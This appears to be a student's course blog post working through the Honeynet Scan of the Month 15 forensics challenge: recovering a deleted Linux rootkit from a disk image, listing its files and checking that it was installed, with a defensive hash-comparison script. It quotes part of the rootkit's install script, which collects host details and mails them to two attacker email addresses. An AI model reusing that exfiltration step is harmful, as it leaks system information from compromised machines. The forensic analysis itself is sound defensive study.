In this post I'm doing an assignment given by Tero Karvinen on his Linux server course, about computer forensics, by solving one of the Honeynet Scan of the Month challenges. I'm doing this on my desktop computer: an i5-3570K (4x, 3.8 GHz, 6M), 16 GB RAM, 2x Asus GeForce GTX 560 Ti in SLI mode, booted from an Ubuntu live USB.
The assignment
The assignment is to solve the Honeynet scan of the month 15.
On 15 March 2001, a Linux honeypot was successfully compromised, a rootkit was downloaded to the / partition and then deleted from the system. Your mission is to find and recover the deleted rootkit. If you are not sure where to begin on conducting this forensic analysis and recover the rootkit, we highly recommend you start with the Forensic Challenge. The steps you will have to follow for the rootkit recovery are similar to the steps discussed there. We have posted only the / partition for download to keep this challenge simple. The compressed image is 13MB, (honeynet.tar.gz) ‘MD5=0dff8fb9fe022ea80d8f1a4e4ae33e21’. Once you have downloaded, untarred, and unzipped the partition image, it will be 255 MB and the checksum should be ‘MD5=5a8ebf5725b15e563c825be85f2f852e’.
- Show step by step how you identify and recover the deleted rootkit from the / partition.
- What files make up the deleted rootkit?
Bonus question:
Was the rootkit ever actually installed on the system? How do you know?
Bonus question 2 (added by my teacher):
What information has the attacker left behind about himself?
Preparations
Downloading the ‘.tar.gz’: the URL is given as a link in the assignment; I downloaded the file and saved it to the desktop.
I unpacked the package with ‘tar’ (‘x’ tells the command to extract and ‘f’ gives the file name) [1]
tar xf honeynet.tar.gz
It unpacked a folder called ‘honeynet’ containing a ‘readme’ file and a ‘honeypot.hda8.dd’ file.
Starting the forensics
I needed to find out the files that have been deleted from the file system. To do this I used the command ‘tsk_recover’ [2]
To use the command, I needed to have the ‘sleuthkit’ installed.
sudo apt-get update
sudo apt-get install sleuthkit -y
Then to work:
mkdir deleted
tsk_recover honeypot.hda8.dd deleted/
Among the recovered files I found a tar.gz archive called ‘lk.tgz’, which I suspected to be the rootkit because of its size and because it was a package; no other recovered file looked anything like one. I unpacked it with ‘tar’.
tar xf lk.tgz
This unpacked a folder called ‘last’ containing the following files, some of which have familiar names:
drwxr-xr-x 2 xubuntu xubuntu 500 Feb 26 2001 ./
drwxrwxr-x 5 xubuntu xubuntu 120 Sep 16 10:44 ../
-rwxr-xr-x 1 xubuntu xubuntu 1345 Sep 9 1999 cleaner*
-rwxr-xr-x 1 xubuntu xubuntu 19840 Feb 26 2001 ifconfig*
-rw-r--r-- 1 xubuntu xubuntu 3278 Jan 27 2001 inetd.conf
-rwx------ 1 xubuntu xubuntu 3713 Mar 3 2001 install*
-rwxr-xr-x 1 xubuntu xubuntu 4620 Feb 26 2001 last.cgi*
-rwx------ 1 xubuntu xubuntu 7165 Feb 26 2001 linsniffer*
-rwx------ 1 xubuntu xubuntu 75 Feb 26 2001 logclear*
-rwxr-xr-x 1 xubuntu xubuntu 79 Feb 26 2001 lsattr*
-rwxr-xr-x 1 xubuntu xubuntu 632066 Feb 26 2001 mkxfs*
-rwxr-xr-x 1 xubuntu xubuntu 35300 Feb 26 2001 netstat*
-rw-r--r-- 1 xubuntu xubuntu 1 Feb 26 2001 pidfile
-rwxr-xr-x 1 xubuntu xubuntu 33280 Feb 26 2001 ps*
-rw-r--r-- 1 xubuntu xubuntu 708 Mar 3 2001 s
-rwxr-xr-x 1 xubuntu xubuntu 4060 Feb 26 2001 sense*
-rw-r--r-- 1 xubuntu xubuntu 11407 Jan 27 2001 services
-rwx------ 1 xubuntu xubuntu 8268 Feb 26 2001 sl2*
-rwxr-xr-x 1 xubuntu xubuntu 611931 Feb 8 2002 ssh*
-rw-r--r-- 1 xubuntu xubuntu 880 Oct 22 2000 ssh_config
-rw-r--r-- 1 xubuntu xubuntu 688 Feb 26 2001 sshd_config
-rw------- 1 xubuntu xubuntu 540 Oct 22 2000 ssh_host_key
-rw-r--r-- 1 xubuntu xubuntu 344 Oct 22 2000 ssh_host_key.pub
-rw------- 1 xubuntu xubuntu 512 Oct 22 2000 ssh_random_seed
-rwxr-xr-x 1 xubuntu xubuntu 53588 Feb 26 2001 top*
The two most important files in the folder are ‘install’ and ‘cleaner’. The attacker ran the ‘install’ script, which installs the rootkit; afterwards the ‘cleaner’ script removes lines from the log files to cover the attacker’s tracks.
Was the rootkit installed on the system?
Yes. Here’s how I found out:
I needed to mount the DD file to better read its contents. [3]
mkdir sda1
sudo mount -o "loop,nodev,noexec,ro" honeypot.hda8.dd sda1/
The option ‘-o’ gives us the ability to add options to the mount. Here, we gave four options:
- ‘loop’: treats the file as a block device, so we can interact with the file system as if it were mounted from a real device [4]
- ‘nodev’: it does not interpret character or block special devices on the file system
- ‘noexec’: does not allow direct execution of any binaries on the mounted file system
- ‘ro’: mount the filesystem as read-only
Now I checked whether the rootkit had modified files inside the mounted image, for example the ‘netstat’ binary:
sda1/bin$ ll | grep "netstat"
-rwxr-xr-x 1 root root 35300 Feb 26 2001 netstat*
Here is the corresponding information for the rootkit’s own netstat file:
honeynet/deleted/last$ ll | grep "netstat"
-rwxr-xr-x 1 xubuntu xubuntu 35300 Feb 26 2001 netstat*
The size and the timestamp match exactly, which tells us that the rootkit was installed on the system.
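As an added check (example code of mine, not from the original post or from the rootkit), the script below extends the size-and-date comparison above to every file in the recovered kit and also compares SHA-256 hashes, which is what actually proves that a kit binary replaced the system's. The paths deleted/last and sda1 are assumed to match the layout above; demo() builds a constructed stand-in for them so the example runs offline.

```python
import hashlib
import tempfile
from pathlib import Path

# Assumed layout (not the post's own code): deleted/last is the unpacked kit from
# tsk_recover, sda1 is the read-only mount of honeypot.hda8.dd.
SEARCH_DIRS = ("bin", "sbin", "usr/bin", "usr/sbin")  # where trojaned binaries would land

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:  # chunked read, so large binaries are fine
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def compare_rootkit(kit_dir, mount_dir):
    """Map each kit file that has a same-named counterpart under SEARCH_DIRS in the
    image to (size_match, hash_match, image_path). A hash match proves installation."""
    results = {}
    for kit_file in sorted(Path(kit_dir).iterdir()):
        if not kit_file.is_file():
            continue
        for sub in SEARCH_DIRS:
            sys_file = Path(mount_dir) / sub / kit_file.name
            if sys_file.is_file():
                size_match = kit_file.stat().st_size == sys_file.stat().st_size
                hash_match = size_match and sha256_of(kit_file) == sha256_of(sys_file)
                results[kit_file.name] = (size_match, hash_match, str(sys_file))
                break
    return results

def demo():
    """Constructed stand-in for the honeypot layout so the example runs offline."""
    root = Path(tempfile.mkdtemp())
    kit, mnt = root / "deleted" / "last", root / "sda1"
    for d in (kit, mnt / "bin", mnt / "sbin"):
        d.mkdir(parents=True)
    (kit / "netstat").write_bytes(b"trojaned netstat" * 100)  # installed verbatim
    (mnt / "bin" / "netstat").write_bytes(b"trojaned netstat" * 100)
    (kit / "ps").write_bytes(b"A" * 64)  # same size as the system's ps, different content
    (mnt / "bin" / "ps").write_bytes(b"B" * 64)
    (kit / "ifconfig").write_bytes(b"kit ifconfig")  # system ifconfig left untouched
    (mnt / "sbin" / "ifconfig").write_bytes(b"original ifconfig binary")
    (kit / "install").write_bytes(b"#!/bin/sh\n")  # not a system binary, no counterpart
    return compare_rootkit(kit, mnt)

if __name__ == "__main__":
    for name, (size_ok, hash_ok, where) in demo().items():
        print(f"{name:9} size_match={size_ok} hash_match={hash_ok} ({where})")
```

On the real image, run compare_rootkit("deleted/last", "sda1") and treat only hash matches as proof; a same-size file with a different hash (like the constructed ps) is a lead, not a conclusion.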
What information did the attacker leave about himself?
I noticed that the attacker is Romanian, or at least speaks Romanian, because many of the files are written in that language. The install script also mails the attacker information about the compromised computer:
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
From this, the attacker is probably the owner of the e-mail addresses ‘last@linuxmail.org’ and ‘bidi_damm@yahoo.com’.
Sources
[2][3] Tero Karvinen ‘tsk_recover’, ‘mount’